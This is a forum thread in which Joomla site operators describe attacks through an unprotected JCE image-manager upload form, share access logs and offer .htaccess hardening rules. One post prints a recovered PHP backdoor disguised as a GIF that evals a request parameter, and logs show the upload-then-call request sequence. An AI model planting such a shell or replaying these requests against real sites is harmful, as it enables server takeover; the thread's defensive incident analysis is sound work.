Story about JCE and hack attempt

[ahmad]

Greetings,

I am sharing what I've experienced today and the way I was thinking and analyzing so excuse me if it's a long post ...

I am on a dedicated machine protected by a firewall, proxy and a powerful enterprise anti-virus software. There's no access to the administration and no way for a user to login except through a VPN.

Today the anti-virus detected a 'php_rc57shell' malware. Quick research shown that this is another shell script being used to take control over the files/db ... etc. I checked the access logs and found a POST request matching the time when the anti-virus stopped the file:

Code: Select all

POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 10 "-" "BOT/0.1 (BOT for JCE)"

As shown it's calling com_jce and the imgmanager plugin. So, maybe a user tried to upload some malicious file? is it a hacking attempt? This is a pretty normal request present in everyday's log but :

• 1- It wasn't in the regular working hours our users used to work.
  2- This was the first time this IP address visit the site!

I opened the browser and tried to access this URL directly. I am not logged in so I thought I will get an error or something. I was surprised because the page flashed for a second with the title saying 'Image Manager : 1.5.7.11' then it was redirected to the homepage! I viewed the source and found the image manager upload form waiting for an input.

Now it makes perfect sense. Someone is trying to upload a shell script having an image extension to pass the upload restriction using the unprotected form. I tried to search if that was reported before and found it. Someone even created a script where you post the URL of the website you want to attack and an the file to make it easy for script kiddies to do it :



I am using an old version of JCE. We were planning to upgrade but we have a lot of user groups and many modifications were done so the schedule didn't fit for an upgrade and test yet.

I am using :
JCE version : 1.5.7.11
Image Manager version : 1.5.7.11

Edit : The new versions of JCE redirect directly to the homepage and show an error : You're not authorized to view this resource.

Regards

[mandville]

there have been an awful lot to upgrades between 1.5.7.11 and now, you must have been very busy doing other things.
i suggest you follow checklist 7 safe route to recovery and contact the developer to sort out your "You're not authorized to view this resource." error

[ahmad]

Thankfully, nothing bad happened as the anti-virus stopped the malicious file. Logs show that the user tried to access the file but got a 404. He thought it was uploaded successfully while it wasn't.

The "You're not authorized" message shows up when I try to access the plugin without logging in. So this is a normal behavior not an error I was reporting that this was fixed in the newer versions of JCE.

[gfisch]

Same thing for me!

I was getting rogue redirects added to .htaccess files and written to every directory.
After some digging for suspicious files I found a couple. One example:

Code: Select all

(0)# more ./images/stories/story.php
GIF89a1
<?php 
if (isset($_REQUEST['p1'])) {
	eval(stripslashes($_REQUEST['p1']));
} else {
	echo "djeu84m";
}
?>

Checking apache logs I saw the JCE image manager call three weeks ago:

Code: Select all

91.202.244.73 - - [04/Aug/2012:14:36:25 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a798
1f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1 " 200 70 "-" "BOT/0.1 (BOT for JCE)"
91.202.244.73 - - [04/Aug/2012:14:36:26 -0400] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 2
00 36 "-" "BOT/0.1 (BOT for JCE)"
91.202.244.73 - - [04/Aug/2012:14:36:32 -0400] "GET //images/stories/story.php HTTP/1.1" 200 15 "-" "BOT/0.1 (BOT for JCE)"

Finally updated JCE. Easy to forget about third party software...

[ahmad]

Yes we learn the lessons the hard way!

mandville you got my message? sorry but it's still in my outbox am sure I sent it

[mandville]

the link you provided showed a version
# Vulnerable Version: 2.0.10 (Image Manager 1.5.7.13, Media Manager
1.5.6.3, Template Manager 1.5.5, File Manager 1.5.4.1 & prior versions
also may be affected)
Posted *2011-08-23*

Please check with the developer the latest versions

[BoardBoss]

@ahmad Can you publicly or privately share with me the software that stopped this exploit? I got hit with this hack on a server with multiple Joomla accounts, and it changed every username on every account to "sec-w.com", and the passwords were the same for everybody, too. Since the exploit also scanned the server and gave them access to all account names, etc., they would have super user access to every affected Joomla account.

The only account spared from this exploit were those suspended for one reason or another, and one that was intentionally broken for testing purposes. Because the exploit couldn't post into these accounts, they were not affected.

There were two Joomla security scripts in place being evaluated on several accounts, although the account that was exploited did not have one. I am not naming them because of that, and the fact that a shell script that modifies the DB would not (IMHO) be detected by them as that is not really their focus. I could be (and probably am ) wrong on this, although since neither of the solutions being tested were installed on the exploited account, I am going to ask in the support forums for both.

Cheers!

[ahmad]

@BoardBoss you have my sympathy ...

Right now I do not know what is it. Probably this week I will be back with an answer!

[BoardBoss]

@ahmad Thank you very much in advance for any input you can offer.

[Slackervaara]

To change username and password in a table can be done with phpMyAdmin and if you run a certain query. Maybe you could run such query through a script or through SQL injection. If it is injection you could search your access logs for sec-w.com to see if you detects the hack. If it is in a script on your site you could, if you have a copy of your site on your PC use grep and try to find file with sec-w.com.

[BoardBoss]

To change username and password in a table can be done with phpMyAdmin and if you run a certain query. Maybe you could run such query through a script or through SQL injection. If it is injection you could search your access logs for sec-w.com to see if you detects the hack. If it is in a script on your site you could, if you have a copy of your site on your PC use grep and try to find file with sec-w.com.

Hi - Thank you for the reply; however, I know that.

Think about a Joomla site with 1,000 users. Would you really want to go through and have to manually change all usernames on that site? What if there were 100 such sites on the server? Obviously that would get old in a hurry.

[Slackervaara]

I did not suggest that you should change back username and passwords with phpMyadmin instead I was discussing how the hack was made by telling that such changes can be made with phpMyAdmin. So the hacker can have 1 access to your phpMyAdmin 2 SQL injection or 3 script on your site. I guess you can track SQL injection via accesslogs and scripts via grep of your files as I suggested or using JAMSS-script.

[BoardBoss]

I did not suggest that you should change back username and passwords with phpMyadmin instead I was discussing how the hack was made by telling that such changes can be made with phpMyAdmin. So the hacker can have 1 access to your phpMyAdmin 2 SQL injection or 3 script on your site. I guess you can track SQL injection via accesslogs and scripts via grep of your files as I suggested or using JAMSS-script.

Hi - No problem. We have already identified the source of the exploit. I do not want to identify it here for obvious reasons; however, it appears that it came through a Joomla 1.5.26 site running an older version of an editor extension. I have seen many exploits and hacks over the years and this one is by far potentially the worst. I will know for sure after it is all healed.

[Slackervaara]

I use MySQLDumper for backup and restore. MySQLDumper have the feature that one can restore individual tables, which is very good if the users table have been hacked and usernames substituted. It is only for me to restore that table from backup if I get hacked like you just been.

[BoardBoss]

I use MySQLDumper for backup and restore. MySQLDumper have the feature that one can restore individual tables, which is very good if the users table have been hacked and usernames substituted. It is only for me to restore that table from backup if I get hacked like you just been.

Hi again. The backup process we utilize allows specific tables to be restored as well. I am more interested in preventing future exploits like this as I have better things to do. I am starting by implementing my own termination of support for Joomla 1.5.x.

[mandville]

moderator comment
please keep on topic and not divert into the pros and cons of different methods of backup/restore beyond the fix to this issue.
Would posters please read the full topic and not the last few posts to prevent embarrassment and confusion

[BoardBoss]

moderator comment
please keep on topic and not divert into the pros and cons of different methods of backup/restore beyond the fix to this issue.
Would posters please read the full topic and not the last few posts to prevent embarrassment and confusion

Thank you, Mandville. Timely and right on target, as usual.

[Codelizard]

Today the anti-virus detected a 'php_rc57shell' malware.

I'd love to know what you are running that caught this. What anti-virus?

[jbourque]

I have installed Exploit Scanner from ConfigServer on one of my servers and it actively monitors files uploaded to my server. It runs ClamAV which if a virus is found will automatically quarantine the virus ex. hide.php file and notify me a virus was found. I have been running this for a couple weeks and works amazingly so I just requested to have it installed on my other server.

I am running JCE 2.1.x on many of my sites and I have seen that there is a still an issue with the image manager I just posted on the JCE forum to try and find a resolution to this problem.

So if you are running LINUX and ClamScan it is WORTH the $50 to have Sara install Exploit Scanner on your server for more info check out www.configserver.com

Best of luck

[Codelizard]

Thanks so much.

one thing you should add, irregardless, is an .htaccess file in your /images/ folder that disallows any scripts to be run. So, even if a php file DOES get uploaded, it cannot be executed...

[KCA]

^^^^ Can you please give an example of what that .htaccess file would look like?
Thanks!

[Codelizard]

Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe
Options -ExecCGI

that makes it so scripts of those extensions are not allowed to run, and will generate a FORBIDDEN error if tried.

Another thing to consider in the .htaccess, is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing them as content on "yourwebsite.com". This stops people from linking your images.

Find a good .htaccess tutorial on the web for more options. These are two I use for image folders.

[gregzem]

1. add the following .htaccess into ./images/.htaccess folder to prevent php shell running

#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
#####################

2. deny access to /tmp folder by adding ./tmp/.htaccess with the following content

#####################
deny from all
#####################

3. For Joomla 1.5.x I've created a patch which protects against [removed] so you may want to try it

http://revisium.com/download/jce_patch.zip (instruction enclosed with the .zip)

It works perfectly for my joomla websites so try it.

[mandville]

3. For Joomla 1.5.x I've created a patch which protects against [removed] so you may want to try it

moderators comment : downloading and using patch files from un official sources (often pay per fix sites) may have un wanted consequences.

[gregzem]

1. As far as I know, 1.5.26 is the latest version of Joomla so no new version will be releases and JCE vulnerability will be never resolved. Do you think this is good to keep user without any solution?

2. Patch is 5 lines long so you can easily download and check the source.

[Codelizard]

1. As far as I know, 1.5.26 is the latest version of Joomla so no new version will be releases and JCE vulnerability will be never resolved. Do you think this is good to keep user without any solution?

2. Patch is 5 lines long so you can easily download and check the source.

While I agree with the moderator, the patch is indeed only 5 lines long. Basically, if com_jce is called, and the person is NOT a logged in admin or super admin, then they get permission denied. I'll be making this small change, myself.

[PhilD]

There is a huge range of technical ability on the security forums ranging from none to extensive. While most stuff posted is intended to help, there is a moral obligation for the moderators to warn everyone about use of patches, scripts,etc. from non official sites and that the use of such may cause harm to a site or unintended issues with sites or extensions. Remember, not everyone can (or even wants to) read code and see what it does.

[mandville]

has the patch been offered to jce or would they just say upgrade to the latest version as that is safe??

[Rhand]

has the patch been offered to jce or would they just say upgrade to the latest version as that is safe??

This I would like to know as well. I need to either patch this plugin or use a .htaccess block. One site got hacked twice and probably twice using this vulnerability.

[skuran]

I tested this patch and it's working. It is a simple workaround untill all bloody joomla 1.5 content is upgraded. Thanks.